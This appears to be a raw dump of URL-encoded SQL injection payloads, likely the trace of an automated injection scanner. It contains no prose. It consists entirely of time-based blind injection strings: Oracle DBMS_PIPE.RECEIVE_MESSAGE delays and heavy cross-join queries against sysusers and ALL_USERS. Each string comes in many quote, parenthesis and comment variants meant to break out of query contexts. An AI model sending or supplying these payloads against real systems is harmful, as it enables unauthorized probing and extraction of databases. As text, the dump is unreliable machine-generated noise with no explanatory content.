1%27%20%2B%20%28SELECT%20%27pXZy%27%20FROM%20DUAL%20WHERE%209567%3D9567%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27UAmy%27%20WHERE%209844%3D9844%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202557%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%23 1%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%22%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%281837%3D1837 1%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%282496%3D2496 1%29%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%287642%3D7642 1%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%27DtrI%27%3D%27DtrI 1%27%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%27cbUp%27%3D%27cbUp 1%27%29%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%28%27RuvE%27%3D%27RuvE 1%27%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%27wJVV%27%3D%27wJVV 1%27%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%27eDjd%27%20LIKE%20%27eDjd 1%27%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%27Olax%27%20LIKE%20%27Olax 1%27%29%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%28%27JgEL%27%20LIKE%20%27JgEL 1%27%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%27VnbN%27%20LIKE%20%27VnbN 1%22%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%22IYhU%22%3D%22IYhU 1%22%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%22LHsC%22%3D%22LHsC 1%22%29%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%28%22wJvy%22%3D%22wJvy 1%22%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%22brNV%22%3D%22brNV 1%22%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%22GcKJ%22%20LIKE%20%22GcKJ 1%22%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%22iosj%22%20LIKE%20%22iosj 1%22%29%29%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%28%28%28%22gWgP%22%20LIKE%20%22gWgP 1%22%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20AND%20%22gfsZ%22%20LIKE%20%22gfsZ 1%29%20WHERE%202746%3D2746%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%29%20WHERE%202736%3D2736%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%20WHERE%209517%3D9517%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%22%20WHERE%202916%3D2916%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29 1%27%20%7C%7C%20%28SELECT%206165%20FROM%20DUAL%20WHERE%204789%3D4789%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208331%20WHERE%201706%3D1706%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205124%20FROM%20DUAL%20WHERE%208115%3D8115%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29 1%20%2B%20%28SELECT%203225%20WHERE%206938%3D6938%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29 1%27%20%2B%20%28SELECT%20%27YXJh%27%20FROM%20DUAL%20WHERE%201785%3D1785%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ifOe%27%20WHERE%209271%3D9271%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208553%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28113%29%7C%7CCHR%2888%29%7C%7CCHR%2889%29%7C%7CCHR%28105%29%2C5%29%20%23 1%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%22%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%288467%3D8467 1%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%287617%3D7617 1%29%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%284529%3D4529 1%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%27EBUr%27%3D%27EBUr 1%27%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%27Opms%27%3D%27Opms 1%27%29%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%28%27Omrj%27%3D%27Omrj 1%27%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%27echU%27%3D%27echU 1%27%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%27wshF%27%20LIKE%20%27wshF 1%27%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%27qxTG%27%20LIKE%20%27qxTG 1%27%29%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%28%27eant%27%20LIKE%20%27eant 1%27%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%27Ewos%27%20LIKE%20%27Ewos 1%22%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%22UPxr%22%3D%22UPxr 1%22%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%22afsw%22%3D%22afsw 1%22%29%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%28%22dNnb%22%3D%22dNnb 1%22%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%22Yqpc%22%3D%22Yqpc 1%22%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%22YnBW%22%20LIKE%20%22YnBW 1%22%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%22Uvad%22%20LIKE%20%22Uvad 1%22%29%29%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%28%28%28%22sBZU%22%20LIKE%20%22sBZU 1%22%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20AND%20%22teIU%22%20LIKE%20%22teIU 1%29%20WHERE%204639%3D4639%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%29%20WHERE%209822%3D9822%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%20WHERE%209770%3D9770%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%22%20WHERE%202669%3D2669%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29-- 1%27%20%7C%7C%20%28SELECT%202321%20FROM%20DUAL%20WHERE%208954%3D8954%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204618%20WHERE%205901%3D5901%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209410%20FROM%20DUAL%20WHERE%201376%3D1376%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29 1%20%2B%20%28SELECT%206584%20WHERE%204985%3D4985%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29 1%27%20%2B%20%28SELECT%20%27IAxH%27%20FROM%20DUAL%20WHERE%209606%3D9606%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pJbZ%27%20WHERE%208174%3D8174%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207866%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28106%29%7C%7CCHR%2887%29%7C%7CCHR%2882%29%7C%7CCHR%2868%29%2C5%29--%20%23 1%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%22%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%283855%3D3855 1%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%284557%3D4557 1%29%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%283752%3D3752 1%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27OeWD%27%3D%27OeWD 1%27%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27FFAF%27%3D%27FFAF 1%27%29%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27XOBC%27%3D%27XOBC 1%27%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27YzqH%27%3D%27YzqH 1%27%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27UmtI%27%20LIKE%20%27UmtI 1%27%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27iGbZ%27%20LIKE%20%27iGbZ 1%27%29%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27epXx%27%20LIKE%20%27epXx 1%27%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27IpXP%27%20LIKE%20%27IpXP 1%22%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22SeRO%22%3D%22SeRO 1%22%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22AXlO%22%3D%22AXlO 1%22%29%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22JRaQ%22%3D%22JRaQ 1%22%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22NCYh%22%3D%22NCYh 1%22%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22wFzX%22%20LIKE%20%22wFzX 1%22%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22EdZu%22%20LIKE%20%22EdZu 1%22%29%29%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22OhAA%22%20LIKE%20%22OhAA 1%22%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22LPjJ%22%20LIKE%20%22LPjJ 1%29%20WHERE%207433%3D7433%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%29%20WHERE%207741%3D7741%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%20WHERE%207533%3D7533%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%22%20WHERE%203417%3D3417%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%20%7C%7C%20%28SELECT%205831%20FROM%20DUAL%20WHERE%207723%3D7723%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201123%20WHERE%209732%3D9732%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%209594%20FROM%20DUAL%20WHERE%205703%3D5703%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 1%20%2B%20%28SELECT%204934%20WHERE%208981%3D8981%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 1%27%20%2B%20%28SELECT%20%27VpSd%27%20FROM%20DUAL%20WHERE%202358%3D2358%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27eXpD%27%20WHERE%204219%3D4219%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202393%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 1%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%288813%3D8813 1%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%284127%3D4127 1%29%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%287566%3D7566 1%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27XMch%27%3D%27XMch 1%27%29%29%20AND%207431%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27PLQn%27%3D%27PLQn 